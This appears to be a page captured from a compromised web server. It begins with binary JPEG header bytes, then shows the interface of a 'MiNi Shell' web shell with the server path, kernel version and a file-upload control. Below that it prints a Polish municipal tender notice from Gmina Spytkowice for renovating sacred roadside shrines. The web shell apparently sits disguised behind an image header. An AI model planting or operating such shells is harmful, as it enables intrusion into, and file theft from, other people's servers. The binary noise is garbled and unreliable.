JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210907/0017309701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Kompleksowa renowacja kapliczek sakralnych na terenie Gminy Spytkowice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Spytkowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072182090</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zamkowa 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Spytkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-116</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 33 879 18 20,</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 33 879 15 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@spytkowice.net.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spytkowice.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa renowacja kapliczek sakralnych na terenie Gminy Spytkowice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-82e278f8-0e77-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00173097</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004771/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Kompleksowa renowacja kapliczek sakralnych na terenie Gminy Spytkowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Inwestycja dofinansowana jest w ramach Programu Współpracy Transgranicznej Interreg V-A Polska-Słowacja 2014-2020 (zakres 1) oraz w ramach konkursu „Kapliczki Małopolski_2021” (zakres 2). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/, https://bip.malopolska.pl/ugspytkowice,m,379764,2021.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków<br/>o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z<br/>dnia18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). Ofertę,<br/>oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf,<br/>.pdf,.doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w pkt. 8.16 SWZ składa się, pod<br/>rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym)<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W postępowaniu<br/>o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy<br/>użyciu:1)miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ i ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz (za wyjątkiem składania ofert) 2) poczty<br/>elektronicznej: fundusze@spytkowice.net.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z przetwarzaniem danych osobowych<br/>informujemy – zgodnie z art. 13 ust 1 i ust. 2 oraz art. 14 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L z<br/>04.05.2016 r, Nr 119, s. 1) zwanego dalej „RODO” iż :1) Administratorem danych osobowych jest<br/>Gmina Spytkowice, reprezentowana przez Wójta. Z Administratorem można kontaktować się pod<br/>adresem siedziby: ul. Zamkowa 12, 34-116 Spytkowice oraz pod adresem e-mail:<br/>gmina@spytkowice.net.pl. 2) Administrator wyznaczył Inspektora Ochrony Danych z którym można się<br/>kontaktować pod adresem e-mail: iod@spytkowice.net.pl. 3) Dane osobowe pozyskaliśmy<br/>bezpośrednio od Pani/Pana, a w przypadku kiedy dane nie pochodzą od osoby, której te dane dotyczą<br/>są one pozyskane od kontrahenta, oferenta. 4) Dane osobowe pozyskane w ramach złożonych ofert<br/>będą przetwarzane w celu:a) wyłonienia wykonawców na realizację zamówienia publicznego, a<br/>następnie w celu zawarcia i realizacji umowy (art. 6 ust. 1 lit. b RODO),b) prawidłowej realizacji<br/>postępowania dotyczącego zamówienia publicznego oraz wypełnienia obowiązków prawnych<br/>ciążących na Administratorze, wynikających z ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych (art. 6 ust. 1 lit. c RODO),c) ewentualnego dochodzenia, ustalenia roszczeń lub obrony<br/>przed roszczeniami (art. 6 ust. 1 lit. f RODO). 5) Odbiorcami Pani/Pana danych osobowych będą<br/>wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa.6)<br/>Pani/Pana dane mogą być ponadto przekazywane podmiotom przetwarzającym dane osobowe na<br/>zlecenie Administratora np. dostawcom usług IT (home.pl) i innym podmiotom przetwarzającym dane w<br/>celu określonym przez Administratora – przy czym takie podmioty przetwarzają dane wyłącznie na<br/>podstawie umowy z Administratorem.7) Dane osobowe będą przechowywane przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas jej trwania i wymagany prawem okres archiwizacyjny. 8)<br/>Podanie danych osobowych jest niezbędne dla celów określonych w pkt 4, a ich niepodanie będzie<br/>skutkowało niemożnością rozpatrzenia oferty i zawarcia umowy. 9) W związku z przetwarzaniem<br/>Pani/Pana danych osobowych posiada Pani/Pan prawo do: a) dostępu do treści swoich danych<br/>osobowych, b) prawo do sprostowania danych, c) ograniczenia przetwarzania danych osobowych, d)<br/>wniesienia sprzeciwu wobec przetwarzania,- na zasadach i warunkach wynikających z RODO.10)<br/>Posiada Pani/Pan prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzasadnione jest, że Pana/Pani dane osobowe przetwarzane są przez administratora niezgodnie z<br/>przepisami RODO.11) Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany,<br/>w tym w formie profilowania.12) Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PR.271.16.2021.KO</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> •	Renowacja kapliczki Matki Bożej z Dzieciątkiem w Bachowicach <br/>•	Renowacja kapliczki Matki Bożej Kalwaryjskiej w Ryczowie<br/>•	Renowacja kapliczki Matki Bożej z Dzieciątkiem w Ryczowie<br/>•	Renowacja kapliczki Matki Bożej Niepokalanej w Spytkowicach<br/>•	Renowacja kapliczki słupowej z krzyżem w Spytkowicach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453100-8 - Roboty renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45261300-7 - Kładzenie zaprawy i rynien</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">92522200-8 - Usługi ochrony budynków historycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta najkorzystniejsza uzyska największą sumę punktów wynikającą z<br/>sumy punktów w poszczególnych kryteriach. Punktacja przyznawana ofertom w poszczególnych<br/>kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z<br/>zasadami arytmetyki. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy<br/>wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny. Zamawiający udzieli<br/>zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu rękojmi powyżej minimum 60 miesięcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> •	Kompleksowa renowacja Kapliczki słupowej z żeliwnym krzyżem w Bachowicach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453100-8 - Roboty renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45261300-7 - Kładzenie zaprawy i rynien</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">92522200-8 - Usługi ochrony budynków historycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta najkorzystniejsza uzyska największą sumę punktów wynikającą z<br/>sumy punktów w poszczególnych kryteriach. Punktacja przyznawana ofertom w poszczególnych<br/>kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z<br/>zasadami arytmetyki. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy<br/>wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny. Zamawiający udzieli<br/>zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu rękojmi powyżej minimum 60 miesięcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Sytuacja ekonomiczna lub finansowa<br/>Wykonawca winien posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimum 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych).<br/>	Zdolność techniczna lub zawodowa<br/>1	Posiadanie wiedzy i doświadczenia<br/>Wykonawca musi wykazać, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, roboty budowlane polegające na zrealizowaniu renowacji lub konserwacji obiektów zabytkowych, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących robót określających, czy roboty te zostały wykonane należycie, co najmniej:<br/>Dwie roboty polegające na przeprowadzeniu kompleksowej renowacji kapliczek sakralnych, tj.<br/>a)	- o wartości 30 tys. zł każda (w przypadku składania ofert na zakres 1 lub zakres 1 i zakres 2)<br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia lub polegania na zasobach podmiotów udostępniających zasoby powyższy warunek winien być spełniony przez co najmniej jednego wykonawcę lub podmiot udostępniający zasoby<br/> b) - o wartości 10 tys. zł każda (w przypadku składania oferty wyłącznie na zakres 2)<br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia lub polegania na zasobach podmiotów udostępniających zasoby powyższy warunek winien być spełniony przez co najmniej jednego wykonawcę lub podmiot udostępniający zasoby.<br/>2	. Dysponowanie osobami zdolnymi do wykonania zamówienia<br/>Wykonawca musi mieć do dyspozycji osoby legitymujące się kwalifikacjami odpowiednimi do stanowisk, jakie zostaną tym osobom powierzone.<br/>W szczególności Wykonawca będzie dysponował osobami na każde wymienione stanowisko.<br/>Lp.	Stanowisko	Kwalifikacje (uprawnienia)<br/>1. Dyplomowany konserwator dzieł sztuki	Uprawnienia do organizacji i prowadzenia prac w zakresie konserwacji i renowacji dzieł sztuki <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;<br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/>Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty- załącznik nr 4 do SWZ,<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty.<br/> 